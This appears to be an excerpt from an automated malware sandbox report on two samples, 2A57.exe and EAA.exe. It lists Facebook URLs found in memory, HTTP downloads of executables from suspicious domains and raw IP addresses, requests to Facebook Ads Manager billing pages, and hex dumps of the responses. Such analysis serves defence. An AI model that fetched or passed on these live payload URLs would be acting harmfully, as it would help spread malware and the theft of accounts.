Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/tuAGtaeF5Lw.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/w8iOGQ_Hw3c.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yu/r/G76sQY80s37.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/GG1Y0sYc7My.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://www.facebook.
Source: unknown DNS traffic detected: queries for: furubujjul.net
Source: global traffic HTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
Source: global traffic HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
Source: global traffic HTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 13 Oct 2022 11:08:05 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hbAwJXDRzKYgO3xdYMEmowmTM2idYU9Liu8hsb0MCvcFgfhyvV2XhGRmTUzxe2HnCnNzA9WhmvmuzEKBFqL7PZJQ%2Fzuq7jWpwivO1cF4i2%2FareHc5B02a%2F%2FS1gbJpcjLZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c476a79775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 19 00 00 00 1f 3d 5a e6 71 20 3c 60 7e 45 e7 de bd d8 f7 26 6f 18 c8 43 85 0c 8a ae 57 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 Data Ascii: 3830=Zq <`~E&oCW74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ=Y
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O0GPtpWaEUghJ1RZgPxRZQ%2FbNvsXTqmfccmnAAfZK01bYa7QRlFfHiPsPzV%2B8T2jJ8DeWoywcL6xPCJBdp7L9%2FnTqte%2FpemWOANEEJHqywZ2CzA9%2BaG3w6ui%2Fn2Kk%2Bd3Mg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c49ffd8775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iQopJci%2FORQ7R2gzSi1W37HimXMOqa5r2FwomB83BIDxGz5qQDusFANJR4n92C%2Fm0zzmMJ9%2Fc1Wd4iOzO47rUnhTpPC7ayhqY0VR3OS%2BwcA%2FIiNAYrugixuONmn1fsT7vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4ac937775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Oct 2022 11:07:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KflXCBDDGP50V0sC8JW5W1jfd6Byw5tcbluoCjWwjmwE6FZk4KlQ00lV1sByV2VEcvGqIx6dtEPZ18YJFdSQj7V%2FAABMhHRWqOQqb%2Bir1mXW5Un3kwGwbWdWAAVzXUv4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75979c4b7a72775c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 37 61 32 37 0d 0a 00 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 b7 99 a3 b8 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e f1 ac 9a a5 6e d0 a0 c1 b9 dd 7a 91 28 4d 19 e0 3c 95 a9 18 da f6 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d e0 40 bf 46 30 fd f8 12 6c 33 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2e b9 d4 fe cc 23 b2 15 0a 31 79 2a 88 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 11 38 27 a0 54 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e 06 d1 12 ee c3 de 57 a3 4c b3 86 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 75 c4 7f 74 79 90 6e 43 cc 9b 8b 8b e1 d0 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 30 dd d9 37 00 70 e0 1c c9 20 f5 52 48 10 39 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 39 86 ce ec 35 98 c7 a7 0d ba ca d4 5f fd 40 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f Data Ascii: 7a27`;@0,xO}q4 SJ%9Wd8IkDJ8P>0%y^\Q25GH;lb]o8mWs6(pC6/'%{IyShG*j*T05sq733hsE|WD<P5Q"f=(*jC\SMUdT[Up"XJ3Ob>!Z:V?#BSSR+{~E(U$O~PTb~nz(M<%a>|*HoJ{/a
